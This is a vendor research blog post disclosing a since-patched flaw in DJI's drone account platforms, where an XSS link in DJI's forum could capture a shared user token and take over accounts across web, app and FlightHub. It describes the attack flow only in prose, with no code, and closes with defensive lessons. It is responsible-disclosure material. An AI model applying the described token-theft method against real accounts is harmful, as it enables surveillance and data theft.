In the 19th Century the undercover operations of the Great Game captured the imagination of European adventurers. In the 20th Century, it was the Cold War that made people worldwide fear for who was listening in. In the 21st Century and an age of cyber espionage, a sinister Game of Drones could be emerging to tempt cyber criminals – and it’s a spy game global enterprises should not ignore.
In recent eye opening research, our team uncovered how spying on enterprises, not to mention hundreds of thousands of private individuals, could well have been possible via an account takeover of commercial and consumer drones manufactured by the world’s leading drone vendor, DJI.
Check Point Research informed DJI back in March 2018 who was responded responsibly. The vulnerability has since been patched with DJI classifying this vulnerability as high risk but low probability, and indicated there is no evidence this vulnerability was ever exploited by anyone other than Check Point researchers.
What Is At Risk?
The research team’s work demonstrated how an attacker could gain full access to a user’s account across each of DJI’s account platforms and steal the following, mostly cloud-based, data:
- The drone’s flight records and photos taken during a flight, if a DJI user had synced them with DJI’s cloud servers.
- Information associated with a DJI user’s account (e.g. user profile information, credit card details and more)
- The drone’s real time camera, microphone and map view
- A live view of the drone pilot’s camera and location, if a DJI user were using DJI’s FlightHub flight management software.
What’s more, an attacker would gain access to all the above information with the user remaining completely unaware of such an intrusion.
(Please note: screenshots of flight paths and images seen in this video and the diagram below were taken with thanks to Airdata, who was not involved in this research and was not affected by this vulnerability.)
Who Uses Drones?
The civilian drone and aerial imaging technology industry is now worth an eye-watering $127 billion. Clearly, drones are no longer the domain of only gadget enthusiasts. Within this figure, DJI is reportedly accounting for 70% of the global commercial and consumer drone market.
Drones are increasingly used in the corporate landscape, with customers coming from the critical infrastructure, manufacturing, agricultural, construction, emergency-management, government agencies, military and other sectors.
For example, Telecoms companies use drones to provide temporary internet coverage to battle fields, disaster zones and hard-to-reach areas for seek and rescue operations.
Airlines have also adopted drone technology to carry out inspections of machinery and infrastructure damage and use smart navigation and computer vision to get accurate data from hard-to-reach places. Likewise, drones are used in some of the largest energy plants around the world to inspect dangerously high up areas that were previously accessed by company employees. Indeed, drones are often considered far faster, safer and more economical than more traditional inspection methods.
In addition, delivery and logistics companies are increasingly making heavy use of drones, primarily using pre-programmed flight paths, to carry out their tasks.
Whereas previous concerns regarding the security of drones, though, focused on the hijacking of the drone itself, often referred to as ‘dronejacking’, or using these unmanned aerial vehicles (UAVs) to fly over sensitive locations such as the White House, our research uncovered a simpler and perhaps more serious threat to an organization’s data – a customer account takeover. Let’s take a look at what this could mean for drone users everywhere.
The Potential Damage
Used by so many customers worldwide, both consumer and corporate, drone vendors are actually a massive data collecting machine, obtaining images and other sensitive information from a large range of subject matter. For while users are collecting useful footage that aids them in their work or play, they are often simultaneously, and even unknowingly, sending that collected data to the cloud. This is a feature offered by many drone vendors to provide for superior service based on a cloud infrastructure. Imagine, then, what damage could be done if cyber criminals were to get their hands on that data.
Information provided by drones, such as flight paths, photos, aerial video footage and maps, offers a threat actor key information for the first stage of any cyber or physical attack – reconnaissance.
For those looking to target critical infrastructure facilities such as energy plants or water dams, for example, analyzing intricate details and images of such facilities could easily reveal information that would prove highly useful in a future attack. A threat actor would be able to home in on various technologies to find out which vendor of CCTV cameras or biometric/electronic door locks an enterprise may be using, that could then be investigated to find the correct tools that could bypass them. Indeed, having a detailed view of sensitive areas could reveal to criminals and potential terrorists where security gaps in general may lie, and pave the path to exploiting those gaps.
In the case of delivery and logistics companies, a threat actor may well want to view the preprogrammed flight paths in order to get insights into which packages are being delivered where and to whom in order to intercept them for his own gain. Having information about these flight paths, then, would put him in an ideal position to carry out such an operation.
In general, the surveillance capabilities that hacked drones, or their connected customer accounts, can offer provide a rich resource of information for threat actors. And of course, if this data is not directly useful to one threat actor, it is not hard to find another on the Dark Web to whom it is and could be sold.
And finally, the potential for sensitive data breaches as exposed by our researchers would also make an organization subject to a serious loss of reputation. After all, it would certainly reflect badly on any organization were they to have their entire company’s physical infrastructure (e.g. factories, power plants, military bases etc.) exposed to the public domain, not to mention the financial costs of penalties resulting from the recent implementation of GDPR.
The Mechanics of the Attack
To explain how our team of researchers managed an account takeover of any DJI customer, it is important to note that DJI drone customers are able to log into their account via three cloud-based platforms, all of which share the same user authentication infrastructure:
- DJI’s Web Platform (account, store, forum)
- DJI’s GO/4/pilot Mobile Application
- DJI’s Flighthub (a centralized drone operations management platform)
By exploiting a loophole in DJI’s customer identification process, then, our research team was able to hijack a user’s account and take complete control over any one of these cloud-based platforms and the data stored there.
Starting with an examination of the user identification process performed by DJI’s login platforms, it soon became apparent that DJI’s back-end identified each user with the same identifier token across all platforms. It was fairly straightforward then to carry out an XSS attack that could be posted within the DJI forum that is used by hundreds of thousands of DJI customers, intercept the identifying token and use it to log in as the customer. Unlike most account takeovers, though, that rely on social engineering methods to fool the target victim into sending the attacker their login credentials, our team simply collected the user’s identifying token via a regular looking link posted in DJI’s forum to essentially hack into the victim’s account across all platforms.
In this way, having gained the user’s identifying token, the attacker would then be able to hijack the account, log in and gain access to the flight and personal data registered to their drone. In fact, due to all of DJI’s platforms sharing the same user authentication infrastructure, once the identifying token ID was acquired, it could be used to access any of these platforms and the information stored within them.
Diagram: The three attack flows to steal sensitive data from any of the DJI drone user platforms.
A cause for concern here then was how this vendor’s interest in security was overlooked by its approach to product improvement. For while it may be convenient for the web or app developer to use a single identifier to recognize users across a product’s various services, it also makes it easy for a potential threat actor to move laterally across each system and access the data stored there.
This, after all, is a common issue within product design. The trade-off between product functionalities, user experience and security requirements is a careful balancing act. However, it is one that manufacturers of IoT devices and software developers alike are slowly appreciating. This needs to be tilted more towards security, though there is still much room for advancement.
Example of the data accessible from a drone’s flight log.
(Please note: the screenshots of flight paths and images seen above were taken with thanks to Airdata, who was not involved in this research and was not affected by this vulnerability.)
A Lesson Learned
Cloud services, by their very nature, are accessible from anywhere. While this, of course, has its advantages, it also means they are more susceptible to account takeover attacks. Because of this, it is vital that cloud service providers protect their users by offering a two-factor authentication mechanism. By doing so they can ensure safe authentication is provided for users who wish to access their services remotely.
Another takeaway from this research is the need for segmentation not only at the network infrastructure level but also in the user identification process, whereby access to one service will not immediately follow by access to all services alike.
Segmentation is a policy that is recommended for all organizations across their IT networks in order to contain and limit the damage inflicted by a potential attack. Indeed, in the same way that there should be segmentation of an IT network, so too can there, and should be, segmentation of the data stored within it. Likewise, for cloud-based service providers, segmentation is paramount to minimizing the potential attack surface. Failing to implement this process correctly is what enabled our team to exploit the identification process of one system and gain access to all of the other connected elements of it.
Veritably, the segmentation of data that web and application developers alike can adopt when building their user platforms is a crucial way organizations can ensure that attacks are limited in their scope and the damage they inflict.
So, although the balancing act between usability and security is indeed a challenging one, especially so in a very competitive environment that most companies operate within, it is an area which requires innovative approaches and smart design choices. Manufacturers cannot afford to ignore security in favour of usability alone and must keep security high up their list of priorities.
The primary method used to carry out an account takeover is often thought to be via a phishing attack, most commonly achieved through stealing a user’s login credentials by way of a social engineering. Our recent research into DJI drones illustrates, however, how there are other methods available to cyber criminals.
It also acts as a reminder of how both consumer and corporate data alike is increasingly being held in the cloud via platforms we may not likely think would hold such sensitive data. And unfortunately, data stored in the cloud, is at a higher risk of unwanted exposure due to it being beyond the customer’s perimeter and control. As a result, due to cloud-stored data being more accessible, customers need to be careful who they trust with their most sensitive data and choose a cloud-based service that offers adequate security.
Last year, Check Point Research illustrated how threat actors could infiltrate private homes or corporate offices via cameras held within smart vacuum cleaners. Prior to that, alerts were raised regarding wireless IP cameras that could act as potential entry points for cyber criminals. This latest example of how drones could offer a window for cyber espionage is merely another channel from where sensitive data can be collected and then stored in the cloud – and thus must be taken seriously.
Organizations are well advised to keep this in mind when they are structuring how their own internal data is stored. Furthermore, they should have this front of mind when selecting a cloud service and ensure they are asking the right questions with regards to how that service safeguards their customers’ security.
For while it is true that IoT devices have greatly enlarged the attack surface in the fifth generation of cyber security, it is rather the cloud itself and unauthorized access of it, that poses the great risk to organizations across all industries. As a result, organizations must ensure they are aware of the risks involved in being part of today’s global game of business and take the correct measures required to ensure they are not tomorrow’s victim of it.
For full technical details, please visit Check Point Research.